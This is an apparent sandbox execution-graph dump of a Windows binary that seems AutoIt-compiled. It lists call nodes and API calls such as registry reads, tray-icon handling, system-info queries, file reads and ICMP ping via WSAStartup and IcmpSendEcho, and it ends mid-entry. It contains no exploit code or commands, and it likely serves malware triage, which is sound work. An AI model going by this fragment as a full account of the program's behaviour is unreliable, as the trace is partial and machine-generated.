                                                                                                                                                                                                                                                                                        execution_graph 104947 f56555 104948 f2014b 8 API calls 104947->104948 104949 f5655c 104948->104949 104950 f2017b 8 API calls 104949->104950 104952 f56575 __fread_nolock 104949->104952 104950->104952 104951 f2017b 8 API calls 104953 f5659a 104951->104953 104952->104951 102483 f01033 102488 f068b4 102483->102488 102487 f01042 102496 f0bf73 102488->102496 102493 f069bf 102494 f01038 102493->102494 102504 f06b14 8 API calls __fread_nolock 102493->102504 102495 f20413 29 API calls __onexit 102494->102495 102495->102487 102505 f2017b 102496->102505 102498 f0bf88 102514 f2014b 102498->102514 102500 f06922 102501 f0589f 102500->102501 102529 f058cb 102501->102529 102504->102493 102506 f2014b ___std_exception_copy 102505->102506 102507 f2016a 102506->102507 102509 f2016c 102506->102509 102523 f2521d 7 API calls 2 library calls 102506->102523 102507->102498 102513 f209dd 102509->102513 102524 f23614 RaiseException 102509->102524 102512 f209fa 102512->102498 102525 f23614 RaiseException 102513->102525 102515 f20150 ___std_exception_copy 102514->102515 102516 f2016a 102515->102516 102519 f2016c 102515->102519 102526 f2521d 7 API calls 2 library calls 102515->102526 102516->102500 102518 f209dd 102528 f23614 RaiseException 102518->102528 102519->102518 102527 f23614 RaiseException 102519->102527 102522 f209fa 102522->102500 102523->102506 102524->102513 102525->102512 102526->102515 102527->102518 102528->102522 102530 f058d8 102529->102530 102532 f058be 102529->102532 102531 f058df RegOpenKeyExW 102530->102531 102530->102532 102531->102532 102533 f058f9 RegQueryValueExW 102531->102533 102532->102493 102534 f0591a 102533->102534 102535 f0592f RegCloseKey 102533->102535 102534->102535 102535->102532 102536 f125b2 102537 f125be 102536->102537 102538 f57508 102537->102538 102539 f2017b 8 API calls 102537->102539 102540 f12604 __fread_nolock 102539->102540 102541 f036f5 102544 f0370f 102541->102544 102545 f03726 102544->102545 102546 f0378a 102545->102546 102547 f0372b 102545->102547 102588 f03788 102545->102588 102551 f43df4 102546->102551 102552 f03790 102546->102552 102548 f03804 PostQuitMessage 102547->102548 102549 f03738 102547->102549 102556 f03709 102548->102556 102553 f03743 102549->102553 102554 f43e61 102549->102554 102550 f0376f DefWindowProcW 102550->102556 102603 f02f92 10 API calls 102551->102603 102557 f03797 102552->102557 102558 f037bc SetTimer RegisterWindowMessageW 102552->102558 102559 f0374d 102553->102559 102560 f0380e 102553->102560 102616 f6c8f7 65 API calls ___scrt_fastfail 102554->102616 102564 f037a0 KillTimer 102557->102564 102565 f43d95 102557->102565 102558->102556 102561 f037e5 CreatePopupMenu 102558->102561 102566 f43e46 102559->102566 102567 f03758 102559->102567 102589 f1fcad 102560->102589 102561->102556 102563 f43e15 102604 f1f23c 40 API calls 102563->102604 102596 f03907 102564->102596 102571 f43dd0 MoveWindow 102565->102571 102572 f43d9a 102565->102572 102566->102550 102615 f61423 8 API calls 102566->102615 102574 f037f2 102567->102574 102575 f03763 102567->102575 102568 f43e73 102568->102550 102568->102556 102571->102556 102576 f43da0 102572->102576 102577 f43dbf SetFocus 102572->102577 102601 f0381f 75 API calls ___scrt_fastfail 102574->102601 102575->102550 102585 f03907 Shell_NotifyIconW 102575->102585 102576->102575 102581 f43da9 102576->102581 102577->102556 102602 f02f92 10 API calls 102581->102602 102583 f03802 102583->102556 102586 f43e3a 102585->102586 102605 f0396b 102586->102605 102588->102550 102590 f1fcc5 ___scrt_fastfail 102589->102590 102591 f1fd4b 102589->102591 102617 f061a9 102590->102617 102591->102556 102593 f1fd34 KillTimer SetTimer 102593->102591 102594 f1fcec 102594->102593 102595 f5fe2b Shell_NotifyIconW 102594->102595 102595->102593 102597 f037b3 102596->102597 102598 f03919 ___scrt_fastfail 102596->102598 102600 f059ff DeleteObject DestroyWindow 102597->102600 102599 f03938 Shell_NotifyIconW 102598->102599 102599->102597 102600->102556 102601->102583 102602->102556 102603->102563 102604->102575 102606 f03996 ___scrt_fastfail 102605->102606 102725 f05f32 102606->102725 102609 f03a1c 102611 f440cd Shell_NotifyIconW 102609->102611 102612 f03a3a Shell_NotifyIconW 102609->102612 102613 f061a9 55 API calls 102612->102613 102614 f03a50 102613->102614 102614->102588 102615->102588 102616->102568 102618 f061c6 102617->102618 102637 f062a8 102617->102637 102647 f07ad5 102618->102647 102621 f061e1 102652 f08577 102621->102652 102622 f45278 LoadStringW 102625 f45292 102622->102625 102624 f061f6 102626 f06203 102624->102626 102633 f452ae 102624->102633 102631 f06229 ___scrt_fastfail 102625->102631 102682 f0bed9 102625->102682 102626->102625 102627 f0620d 102626->102627 102664 f06b7c 102627->102664 102635 f0628e Shell_NotifyIconW 102631->102635 102633->102631 102634 f452f1 102633->102634 102636 f0bf73 8 API calls 102633->102636 102687 f1fe6f 51 API calls 102634->102687 102635->102637 102638 f452d8 102636->102638 102637->102594 102686 f6a350 9 API calls 102638->102686 102641 f452e3 102643 f07bb5 8 API calls 102641->102643 102642 f45310 102644 f06b7c 8 API calls 102642->102644 102643->102634 102645 f45321 102644->102645 102646 f06b7c 8 API calls 102645->102646 102646->102631 102648 f2017b 8 API calls 102647->102648 102649 f07afa 102648->102649 102650 f2014b 8 API calls 102649->102650 102651 f061d4 102650->102651 102651->102621 102651->102622 102653 f46610 102652->102653 102656 f08587 _wcslen 102652->102656 102689 f0adf4 102653->102689 102655 f46619 102655->102655 102657 f085c2 102656->102657 102658 f0859d 102656->102658 102659 f2014b 8 API calls 102657->102659 102688 f088e8 8 API calls 102658->102688 102661 f085ce 102659->102661 102663 f2017b 8 API calls 102661->102663 102662 f085a5 __fread_nolock 102662->102624 102663->102662 102665 f06b93 102664->102665 102666 f457fe 102664->102666 102699 f06ba4 102665->102699 102668 f2014b 8 API calls 102666->102668 102670 f45808 _wcslen 102668->102670 102669 f0621b 102673 f07bb5 102669->102673 102671 f2017b 8 API calls 102670->102671 102672 f45841 __fread_nolock 102671->102672 102674 f07bc7 102673->102674 102675 f4641d 102673->102675 102714 f07bd8 102674->102714 102724 f613c8 8 API calls __fread_nolock 102675->102724 102678 f07bd3 102678->102631 102679 f46427 102680 f46433 102679->102680 102681 f0bed9 8 API calls 102679->102681 102681->102680 102683 f0beed 102682->102683 102685 f0befc __fread_nolock 102682->102685 102684 f2017b 8 API calls 102683->102684 102683->102685 102684->102685 102685->102631 102686->102641 102687->102642 102688->102662 102690 f0ae02 102689->102690 102692 f0ae0b __fread_nolock 102689->102692 102690->102692 102693 f0c2c9 102690->102693 102692->102655 102694 f0c2d9 __fread_nolock 102693->102694 102695 f0c2dc 102693->102695 102694->102692 102696 f2014b 8 API calls 102695->102696 102697 f0c2e7 102696->102697 102698 f2017b 8 API calls 102697->102698 102698->102694 102700 f06bb4 _wcslen 102699->102700 102701 f45860 102700->102701 102702 f06bc7 102700->102702 102703 f2014b 8 API calls 102701->102703 102709 f07d74 102702->102709 102705 f4586a 102703->102705 102707 f2017b 8 API calls 102705->102707 102706 f06bd4 __fread_nolock 102706->102669 102708 f4589a __fread_nolock 102707->102708 102710 f07d8a 102709->102710 102713 f07d85 __fread_nolock 102709->102713 102711 f2017b 8 API calls 102710->102711 102712 f46528 102710->102712 102711->102713 102713->102706 102715 f07be7 102714->102715 102721 f07c1b __fread_nolock 102714->102721 102716 f4644e 102715->102716 102717 f07c0e 102715->102717 102715->102721 102718 f2014b 8 API calls 102716->102718 102719 f07d74 8 API calls 102717->102719 102720 f4645d 102718->102720 102719->102721 102722 f2017b 8 API calls 102720->102722 102721->102678 102723 f46491 __fread_nolock 102722->102723 102724->102679 102726 f039eb 102725->102726 102727 f05f4e 102725->102727 102726->102609 102729 f6d11f 42 API calls _strftime 102726->102729 102727->102726 102728 f45070 DestroyIcon 102727->102728 102728->102726 102729->102609 104954 f55650 104963 f1e3d5 104954->104963 104956 f55666 104958 f556e1 104956->104958 104972 f1aa65 9 API calls 104956->104972 104962 f561d7 104958->104962 104974 f73fe1 81 API calls __wsopen_s 104958->104974 104960 f556c1 104960->104958 104973 f7247e 8 API calls 104960->104973 104964 f1e3e3 104963->104964 104965 f1e3f6 104963->104965 104975 f0b4c8 8 API calls 104964->104975 104967 f1e429 104965->104967 104968 f1e3fb 104965->104968 104976 f0b4c8 8 API calls 104967->104976 104970 f2014b 8 API calls 104968->104970 104971 f1e3ed 104970->104971 104971->104956 104972->104960 104973->104958 104974->104962 104975->104971 104976->104971 104977 f01098 104982 f05fc8 104977->104982 104981 f010a7 104983 f0bf73 8 API calls 104982->104983 104984 f05fdf GetVersionExW 104983->104984 104985 f08577 8 API calls 104984->104985 104986 f0602c 104985->104986 104987 f0adf4 8 API calls 104986->104987 104999 f06062 104986->104999 104988 f06056 104987->104988 104990 f055dc 8 API calls 104988->104990 104989 f0611c GetCurrentProcess IsWow64Process 104991 f06138 104989->104991 104990->104999 104992 f06150 LoadLibraryA 104991->104992 104993 f45269 GetSystemInfo 104991->104993 104994 f06161 GetProcAddress 104992->104994 104995 f0619d GetSystemInfo 104992->104995 104994->104995 104998 f06171 GetNativeSystemInfo 104994->104998 104996 f06177 104995->104996 105000 f0109d 104996->105000 105001 f0617b FreeLibrary 104996->105001 104997 f45224 104998->104996 104999->104989 104999->104997 105002 f20413 29 API calls __onexit 105000->105002 105001->105000 105002->104981 102730 f3947a 102731 f39487 102730->102731 102735 f3949f 102730->102735 102787 f2f649 20 API calls _abort 102731->102787 102733 f3948c 102788 f32b5c 26 API calls __wsopen_s 102733->102788 102736 f394fa 102735->102736 102744 f39497 102735->102744 102789 f40144 21 API calls 2 library calls 102735->102789 102750 f2dcc5 102736->102750 102739 f39512 102757 f38fb2 102739->102757 102741 f39519 102742 f2dcc5 __fread_nolock 26 API calls 102741->102742 102741->102744 102743 f39545 102742->102743 102743->102744 102745 f2dcc5 __fread_nolock 26 API calls 102743->102745 102746 f39553 102745->102746 102746->102744 102747 f2dcc5 __fread_nolock 26 API calls 102746->102747 102748 f39563 102747->102748 102749 f2dcc5 __fread_nolock 26 API calls 102748->102749 102749->102744 102751 f2dcd1 102750->102751 102752 f2dce6 102750->102752 102790 f2f649 20 API calls _abort 102751->102790 102752->102739 102754 f2dcd6 102791 f32b5c 26 API calls __wsopen_s 102754->102791 102756 f2dce1 102756->102739 102758 f38fbe ___BuildCatchObject 102757->102758 102759 f38fc6 102758->102759 102760 f38fde 102758->102760 102858 f2f636 20 API calls _abort 102759->102858 102762 f390a4 102760->102762 102766 f39017 102760->102766 102865 f2f636 20 API calls _abort 102762->102865 102763 f38fcb 102859 f2f649 20 API calls _abort 102763->102859 102768 f39026 102766->102768 102769 f3903b 102766->102769 102767 f390a9 102866 f2f649 20 API calls _abort 102767->102866 102860 f2f636 20 API calls _abort 102768->102860 102792 f354ba EnterCriticalSection 102769->102792 102773 f39033 102867 f32b5c 26 API calls __wsopen_s 102773->102867 102774 f3902b 102861 f2f649 20 API calls _abort 102774->102861 102775 f39041 102776 f39072 102775->102776 102777 f3905d 102775->102777 102793 f390c5 102776->102793 102862 f2f649 20 API calls _abort 102777->102862 102779 f38fd3 __wsopen_s 102779->102741 102783 f39062 102863 f2f636 20 API calls _abort 102783->102863 102784 f3906d 102864 f3909c LeaveCriticalSection __wsopen_s 102784->102864 102787->102733 102788->102744 102789->102736 102790->102754 102791->102756 102792->102775 102794 f390d7 102793->102794 102795 f390ef 102793->102795 102884 f2f636 20 API calls _abort 102794->102884 102796 f39459 102795->102796 102800 f39134 102795->102800 102907 f2f636 20 API calls _abort 102796->102907 102798 f390dc 102885 f2f649 20 API calls _abort 102798->102885 102804 f3913f 102800->102804 102805 f390e4 102800->102805 102811 f3916f 102800->102811 102802 f3945e 102908 f2f649 20 API calls _abort 102802->102908 102886 f2f636 20 API calls _abort 102804->102886 102805->102784 102806 f3914c 102909 f32b5c 26 API calls __wsopen_s 102806->102909 102808 f39144 102887 f2f649 20 API calls _abort 102808->102887 102812 f39188 102811->102812 102813 f391ca 102811->102813 102814 f391ae 102811->102814 102812->102814 102847 f39195 102812->102847 102868 f33b93 102813->102868 102888 f2f636 20 API calls _abort 102814->102888 102816 f391b3 102889 f2f649 20 API calls _abort 102816->102889 102821 f391ba 102890 f32b5c 26 API calls __wsopen_s 102821->102890 102824 f393a9 102827 f393ad ReadFile 102824->102827 102825 f39333 102825->102824 102828 f3934c GetConsoleMode 102825->102828 102826 f391ea 102829 f32d38 _free 20 API calls 102826->102829 102831 f39421 GetLastError 102827->102831 102832 f393c7 102827->102832 102828->102824 102833 f3935d 102828->102833 102830 f391f1 102829->102830 102834 f39216 102830->102834 102835 f391fb 102830->102835 102836 f39385 102831->102836 102837 f3942e 102831->102837 102832->102831 102838 f3939e 102832->102838 102833->102827 102839 f39363 ReadConsoleW 102833->102839 102899 f397a4 102834->102899 102897 f2f649 20 API calls _abort 102835->102897 102856 f391c5 __fread_nolock 102836->102856 102902 f2f613 20 API calls __dosmaperr 102836->102902 102905 f2f649 20 API calls _abort 102837->102905 102851 f39403 102838->102851 102852 f393ec 102838->102852 102838->102856 102839->102838 102844 f3937f GetLastError 102839->102844 102840 f32d38 _free 20 API calls 102840->102805 102844->102836 102845 f39200 102898 f2f636 20 API calls _abort 102845->102898 102846 f39433 102906 f2f636 20 API calls _abort 102846->102906 102875 f3fc1b 102847->102875 102854 f3941a 102851->102854 102851->102856 102903 f38de1 31 API calls 3 library calls 102852->102903 102904 f38c21 29 API calls __wsopen_s 102854->102904 102856->102840 102857 f3941f 102857->102856 102858->102763 102859->102779 102860->102774 102861->102773 102862->102783 102863->102784 102864->102779 102865->102767 102866->102773 102867->102779 102869 f33bd1 102868->102869 102873 f33ba1 _abort 102868->102873 102911 f2f649 20 API calls _abort 102869->102911 102871 f33bbc RtlAllocateHeap 102872 f33bcf 102871->102872 102871->102873 102891 f32d38 102872->102891 102873->102869 102873->102871 102910 f2521d 7 API calls 2 library calls 102873->102910 102876 f3fc35 102875->102876 102877 f3fc28 102875->102877 102879 f3fc41 102876->102879 102913 f2f649 20 API calls _abort 102876->102913 102912 f2f649 20 API calls _abort 102877->102912 102879->102825 102881 f3fc2d 102881->102825 102882 f3fc62 102914 f32b5c 26 API calls __wsopen_s 102882->102914 102884->102798 102885->102805 102886->102808 102887->102806 102888->102816 102889->102821 102890->102856 102892 f32d43 RtlFreeHeap 102891->102892 102893 f32d6c __dosmaperr 102891->102893 102892->102893 102894 f32d58 102892->102894 102893->102826 102915 f2f649 20 API calls _abort 102894->102915 102896 f32d5e GetLastError 102896->102893 102897->102845 102898->102856 102916 f3970b 102899->102916 102902->102856 102903->102856 102904->102857 102905->102846 102906->102856 102907->102802 102908->102806 102909->102805 102910->102873 102911->102872 102912->102881 102913->102882 102914->102881 102915->102896 102925 f35737 102916->102925 102918 f3971d 102919 f39736 SetFilePointerEx 102918->102919 102920 f39725 102918->102920 102922 f3974e GetLastError 102919->102922 102924 f3972a 102919->102924 102938 f2f649 20 API calls _abort 102920->102938 102939 f2f613 20 API calls __dosmaperr 102922->102939 102924->102847 102926 f35744 102925->102926 102927 f35759 102925->102927 102940 f2f636 20 API calls _abort 102926->102940 102933 f3577e 102927->102933 102942 f2f636 20 API calls _abort 102927->102942 102930 f35749 102941 f2f649 20 API calls _abort 102930->102941 102931 f35789 102943 f2f649 20 API calls _abort 102931->102943 102933->102918 102935 f35751 102935->102918 102936 f35791 102944 f32b5c 26 API calls __wsopen_s 102936->102944 102938->102924 102939->102924 102940->102930 102941->102935 102942->102931 102943->102936 102944->102935 105003 f0105b 105008 f052a7 105003->105008 105005 f0106a 105039 f20413 29 API calls __onexit 105005->105039 105007 f01074 105009 f052b7 __wsopen_s 105008->105009 105010 f0bf73 8 API calls 105009->105010 105011 f0536d 105010->105011 105012 f05594 10 API calls 105011->105012 105013 f05376 105012->105013 105040 f05238 105013->105040 105016 f06b7c 8 API calls 105017 f0538f 105016->105017 105018 f06a7c 8 API calls 105017->105018 105019 f0539e 105018->105019 105020 f0bf73 8 API calls 105019->105020 105021 f053a7 105020->105021 105022 f0bd57 8 API calls 105021->105022 105023 f053b0 RegOpenKeyExW 105022->105023 105024 f44be6 RegQueryValueExW 105023->105024 105027 f053d2 105023->105027 105025 f44c03 105024->105025 105026 f44c7c RegCloseKey 105024->105026 105028 f2017b 8 API calls 105025->105028 105026->105027 105038 f44c8e _wcslen 105026->105038 105027->105005 105029 f44c1c 105028->105029 105030 f0423c 8 API calls 105029->105030 105031 f44c27 RegQueryValueExW 105030->105031 105032 f44c44 105031->105032 105035 f44c5e messages 105031->105035 105033 f08577 8 API calls 105032->105033 105033->105035 105034 f0655e 8 API calls 105034->105038 105035->105026 105036 f0b329 8 API calls 105036->105038 105037 f06a7c 8 API calls 105037->105038 105038->105027 105038->105034 105038->105036 105038->105037 105039->105007 105041 f422d0 __wsopen_s 105040->105041 105042 f05245 GetFullPathNameW 105041->105042 105043 f05267 105042->105043 105044 f08577 8 API calls 105043->105044 105045 f05285 105044->105045 105045->105016 105046 f0f4dc 105047 f0cab0 206 API calls 105046->105047 105048 f0f4ea 105047->105048 102945 f0dd3d 102946 f0dd63 102945->102946 102947 f519c2 102945->102947 102950 f2014b 8 API calls 102946->102950 102968 f0dead 102946->102968 102949 f51a82 102947->102949 102953 f51a26 102947->102953 102956 f51a46 102947->102956 103028 f73fe1 81 API calls __wsopen_s 102949->103028 102955 f0dd8d 102950->102955 102951 f2017b 8 API calls 102958 f0dee4 __fread_nolock 102951->102958 103026 f1e6e8 206 API calls 102953->103026 102957 f2014b 8 API calls 102955->102957 102955->102958 102967 f51a7d 102956->102967 103027 f73fe1 81 API calls __wsopen_s 102956->103027 102960 f0dddb 102957->102960 102958->102956 102959 f2017b 8 API calls 102958->102959 102959->102958 102960->102953 102961 f0de16 102960->102961 102994 f10340 102961->102994 102963 f51aa5 103029 f73fe1 81 API calls __wsopen_s 102963->103029 102964 f0de29 102964->102958 102964->102963 102965 f0de77 102964->102965 102964->102967 102969 f0d526 102964->102969 102965->102968 102965->102969 102968->102951 102970 f2014b 8 API calls 102969->102970 102971 f0d589 102970->102971 102987 f0c32d 102971->102987 102974 f2014b 8 API calls 102980 f0d66e messages 102974->102980 102976 f0bed9 8 API calls 102976->102980 102979 f51f79 103031 f656ae 8 API calls messages 102979->103031 102980->102976 102980->102979 102982 f51f94 102980->102982 102983 f0c3ab 8 API calls 102980->102983 102984 f0d911 messages 102980->102984 103030 f0b4c8 8 API calls 102980->103030 102983->102980 102985 f0d9ac messages 102984->102985 103017 f0c3ab 102984->103017 102986 f0d9c3 102985->102986 103025 f1e30a 8 API calls messages 102985->103025 102991 f0c33d 102987->102991 102988 f0c345 102988->102974 102989 f2014b 8 API calls 102989->102991 102990 f0bf73 8 API calls 102990->102991 102991->102988 102991->102989 102991->102990 102992 f0bed9 8 API calls 102991->102992 102993 f0c32d 8 API calls 102991->102993 102992->102991 102993->102991 103013 f10376 messages 102994->103013 102995 f20413 29 API calls pre_c_initialization 102995->103013 102996 f5632b 103107 f73fe1 81 API calls __wsopen_s 102996->103107 102998 f11695 103004 f0bed9 8 API calls 102998->103004 103011 f1049d messages 102998->103011 102999 f2014b 8 API calls 102999->103013 103001 f55cdb 103008 f0bed9 8 API calls 103001->103008 103001->103011 103002 f5625a 103106 f73fe1 81 API calls __wsopen_s 103002->103106 103003 f0bed9 8 API calls 103003->103013 103004->103011 103008->103011 103009 f205b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103009->103013 103010 f0bf73 8 API calls 103010->103013 103011->102964 103012 f56115 103104 f73fe1 81 API calls __wsopen_s 103012->103104 103013->102995 103013->102996 103013->102998 103013->102999 103013->103001 103013->103002 103013->103003 103013->103009 103013->103010 103013->103011 103013->103012 103014 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103013->103014 103016 f10aae messages 103013->103016 103032 f11990 103013->103032 103094 f11e50 103013->103094 103014->103013 103105 f73fe1 81 API calls __wsopen_s 103016->103105 103018 f0c3b9 103017->103018 103024 f0c3e1 messages 103017->103024 103019 f0c3c7 103018->103019 103020 f0c3ab 8 API calls 103018->103020 103021 f0c3cd 103019->103021 103022 f0c3ab 8 API calls 103019->103022 103020->103019 103021->103024 103813 f0c7e0 8 API calls messages 103021->103813 103022->103021 103024->102985 103025->102985 103026->102956 103027->102967 103028->102967 103029->102967 103030->102980 103031->102982 103033 f119b6 103032->103033 103034 f11a2e 103032->103034 103036 f119c3 103033->103036 103037 f56b60 103033->103037 103035 f56a4d 103034->103035 103050 f11a3d 103034->103050 103039 f56b54 103035->103039 103040 f56a58 103035->103040 103045 f56b84 103036->103045 103046 f119cd 103036->103046 103114 f885db 206 API calls 2 library calls 103037->103114 103113 f73fe1 81 API calls __wsopen_s 103039->103113 103112 f1b35c 206 API calls 103040->103112 103041 f10340 206 API calls 103041->103050 103044 f56bb5 103047 f56bc0 103044->103047 103048 f56be2 103044->103048 103045->103044 103049 f56b9c 103045->103049 103055 f0bed9 8 API calls 103046->103055 103093 f119e0 messages 103046->103093 103116 f885db 206 API calls 2 library calls 103047->103116 103117 f860e6 103048->103117 103115 f73fe1 81 API calls __wsopen_s 103049->103115 103050->103041 103051 f56979 103050->103051 103054 f11bb5 103050->103054 103058 f56908 103050->103058 103069 f11ba9 103050->103069 103077 f11af4 103050->103077 103050->103093 103111 f73fe1 81 API calls __wsopen_s 103051->103111 103054->103013 103055->103093 103110 f73fe1 81 API calls __wsopen_s 103058->103110 103059 f56dd9 103064 f56e0f 103059->103064 103215 f881ce 65 API calls 103059->103215 103062 f56c81 103188 f71ad8 8 API calls 103062->103188 103217 f0b4c8 8 API calls 103064->103217 103065 f56db7 103191 f08ec0 103065->103191 103068 f0bed9 8 API calls 103068->103093 103069->103054 103109 f73fe1 81 API calls __wsopen_s 103069->103109 103071 f56ded 103074 f08ec0 52 API calls 103071->103074 103073 f56c08 103124 f7148b 103073->103124 103088 f56df5 _wcslen 103074->103088 103076 f56c93 103189 f0bd07 8 API calls 103076->103189 103077->103069 103108 f11ca0 8 API calls 103077->103108 103081 f11b55 103081->103069 103089 f11b62 messages 103081->103089 103082 f5691d messages 103082->103051 103082->103089 103091 f11a23 messages 103082->103091 103083 f56dbf _wcslen 103083->103059 103214 f0b4c8 8 API calls 103083->103214 103085 f56c9c 103092 f7148b 8 API calls 103085->103092 103088->103064 103216 f0b4c8 8 API calls 103088->103216 103089->103068 103089->103091 103089->103093 103091->103013 103092->103093 103093->103059 103093->103091 103190 f8808f 53 API calls __wsopen_s 103093->103190 103097 f11e6d messages 103094->103097 103095 f12512 103098 f11ff7 messages 103095->103098 103812 f1be08 39 API calls 103095->103812 103097->103095 103097->103098 103100 f57837 103097->103100 103103 f5766b 103097->103103 103810 f1e322 8 API calls messages 103097->103810 103098->103013 103100->103098 103811 f2d2d5 39 API calls 103100->103811 103809 f2d2d5 39 API calls 103103->103809 103104->103016 103105->103011 103106->103011 103107->103011 103108->103081 103109->103091 103110->103082 103111->103093 103112->103089 103113->103037 103114->103093 103115->103091 103116->103093 103118 f86101 103117->103118 103123 f56bed 103117->103123 103119 f2017b 8 API calls 103118->103119 103120 f86123 103119->103120 103121 f2014b 8 API calls 103120->103121 103120->103123 103218 f71400 8 API calls 103120->103218 103121->103120 103123->103062 103123->103073 103125 f56c32 103124->103125 103126 f71499 103124->103126 103128 f12b20 103125->103128 103126->103125 103127 f2014b 8 API calls 103126->103127 103127->103125 103129 f12b61 103128->103129 103130 f12fc0 103129->103130 103131 f12b86 103129->103131 103377 f205b2 5 API calls __Init_thread_wait 103130->103377 103133 f12ba0 103131->103133 103134 f57bd8 103131->103134 103219 f13160 103133->103219 103340 f87af9 103134->103340 103136 f12fca 103146 f1300b 103136->103146 103378 f0b329 103136->103378 103139 f57be4 103139->103093 103141 f13160 9 API calls 103142 f12bc6 103141->103142 103143 f12bfc 103142->103143 103142->103146 103145 f57bfd 103143->103145 103152 f12c18 __fread_nolock 103143->103152 103144 f57bed 103144->103093 103388 f73fe1 81 API calls __wsopen_s 103145->103388 103146->103144 103385 f0b4c8 8 API calls 103146->103385 103149 f12fe4 103384 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103149->103384 103150 f13049 103386 f1e6e8 206 API calls 103150->103386 103152->103150 103154 f57c15 103152->103154 103161 f2014b 8 API calls 103152->103161 103162 f2017b 8 API calls 103152->103162 103168 f10340 206 API calls 103152->103168 103169 f12d3f 103152->103169 103172 f57c59 103152->103172 103177 f12dd7 messages 103152->103177 103389 f73fe1 81 API calls __wsopen_s 103154->103389 103156 f57c78 103391 f861a2 53 API calls _wcslen 103156->103391 103157 f12d4c 103158 f13160 9 API calls 103157->103158 103160 f12d59 103158->103160 103164 f13160 9 API calls 103160->103164 103160->103177 103161->103152 103162->103152 103163 f13082 103387 f1fe39 8 API calls 103163->103387 103174 f12d73 103164->103174 103167 f12f2d 103167->103093 103168->103152 103169->103156 103169->103157 103170 f13160 9 API calls 103170->103177 103390 f73fe1 81 API calls __wsopen_s 103172->103390 103173 f12e8b messages 103173->103167 103376 f1e322 8 API calls messages 103173->103376 103176 f0bed9 8 API calls 103174->103176 103174->103177 103176->103177 103177->103163 103177->103170 103177->103173 103229 f89ffc 103177->103229 103232 f8a6aa 103177->103232 103240 f8ee2f 103177->103240 103267 f8a9ac 103177->103267 103275 f80fb8 103177->103275 103300 f7664c 103177->103300 103307 f8a5b2 103177->103307 103313 f89fe8 103177->103313 103316 f1ac3e 103177->103316 103335 f8ad47 103177->103335 103392 f73fe1 81 API calls __wsopen_s 103177->103392 103188->103076 103189->103085 103190->103065 103192 f08ed2 103191->103192 103193 f08ed5 103191->103193 103192->103083 103194 f08f0b 103193->103194 103195 f08edd 103193->103195 103197 f46b1f 103194->103197 103200 f08f1d 103194->103200 103205 f46a38 103194->103205 103805 f25536 26 API calls 103195->103805 103808 f254f3 26 API calls 103197->103808 103198 f08eed 103204 f2014b 8 API calls 103198->103204 103806 f1fe6f 51 API calls 103200->103806 103201 f46b37 103201->103201 103206 f08ef7 103204->103206 103208 f2017b 8 API calls 103205->103208 103213 f46ab1 103205->103213 103207 f0b329 8 API calls 103206->103207 103207->103192 103209 f46a81 103208->103209 103210 f2014b 8 API calls 103209->103210 103211 f46aa8 103210->103211 103212 f0b329 8 API calls 103211->103212 103212->103213 103807 f1fe6f 51 API calls 103213->103807 103214->103059 103215->103071 103216->103064 103217->103091 103218->103120 103220 f131a1 103219->103220 103221 f1317d 103219->103221 103393 f205b2 5 API calls __Init_thread_wait 103220->103393 103228 f12bb0 103221->103228 103395 f205b2 5 API calls __Init_thread_wait 103221->103395 103224 f131ab 103224->103221 103394 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103224->103394 103225 f19f47 103225->103228 103396 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103225->103396 103228->103141 103397 f889b6 103229->103397 103231 f8a00c 103231->103177 103234 f8a705 103232->103234 103237 f8a6c5 103232->103237 103233 f8a723 103233->103237 103238 f8a780 103233->103238 103556 f0c98d 39 API calls 103233->103556 103234->103233 103555 f0c98d 39 API calls 103234->103555 103237->103177 103523 f70372 103238->103523 103241 f08ec0 52 API calls 103240->103241 103242 f8ee4a 103241->103242 103243 f07ad5 8 API calls 103242->103243 103244 f8ee59 103243->103244 103245 f8ee8d 103244->103245 103612 f0c98d 39 API calls 103244->103612 103597 f081d6 103245->103597 103248 f8ee6a 103248->103245 103251 f8ee6f 103248->103251 103250 f0b329 8 API calls 103253 f8eea4 103250->103253 103252 f0bed9 8 API calls 103251->103252 103254 f8ee7f 103251->103254 103252->103254 103257 f8eecc 103253->103257 103258 f0bed9 8 API calls 103253->103258 103614 f07b1a 8 API calls 103254->103614 103256 f8ef8d 103256->103177 103259 f0bf73 8 API calls 103257->103259 103258->103257 103262 f8eef9 103259->103262 103260 f8ef30 103263 f07bb5 8 API calls 103260->103263 103265 f8ef4e 103260->103265 103262->103260 103600 f699ff 103262->103600 103606 f06a7c 103262->103606 103263->103260 103613 f0839a 8 API calls 103265->103613 103268 f8aa08 103267->103268 103274 f8a9c8 103267->103274 103269 f8aa26 103268->103269 103616 f0c98d 39 API calls 103268->103616 103272 f8aa8e 103269->103272 103269->103274 103617 f0c98d 39 API calls 103269->103617 103273 f70372 58 API calls 103272->103273 103273->103274 103274->103177 103276 f80fe1 103275->103276 103277 f8100f WSAStartup 103276->103277 103631 f0c98d 39 API calls 103276->103631 103278 f81054 103277->103278 103299 f81023 messages 103277->103299 103618 f1c1f6 103278->103618 103281 f80ffc 103281->103277 103632 f0c98d 39 API calls 103281->103632 103283 f08ec0 52 API calls 103285 f81069 103283->103285 103623 f1f9d4 WideCharToMultiByte 103285->103623 103286 f8100b 103286->103277 103288 f81075 inet_addr gethostbyname 103289 f81093 IcmpCreateFile 103288->103289 103288->103299 103290 f810d3 103289->103290 103289->103299 103291 f2017b 8 API calls 103290->103291 103292 f810ec 103291->103292 103633 f0423c 103292->103633 103295 f8112b IcmpSendEcho 103297 f8114c 103295->103297 103296 f81102 IcmpSendEcho 103296->103297 103298 f81212 IcmpCloseHandle WSACleanup 103297->103298 103298->103299 103299->103177 103301 f08ec0 52 API calls 103300->103301 103302 f76662 103301->103302 103638 f6dc54 103302->103638 103304 f7666a 103305 f7666e GetLastError 103304->103305 103306 f76683 103304->103306 103305->103306 103306->103177 103309 f8a5c5 103307->103309 103308 f08ec0 52 API calls 103310 f8a632 103308->103310 103309->103308 103312 f8a5d4 103309->103312 103732 f718a9 103310->103732 103312->103177 103314 f889b6 119 API calls 103313->103314 103315 f89ff8 103314->103315 103315->103177 103317 f08ec0 52 API calls 103316->103317 103318 f1ac68 103317->103318 103773 f1bc58 103318->103773 103320 f1ac7f 103330 f1b09b _wcslen 103320->103330 103778 f0c98d 39 API calls 103320->103778 103322 f24d98 _strftime 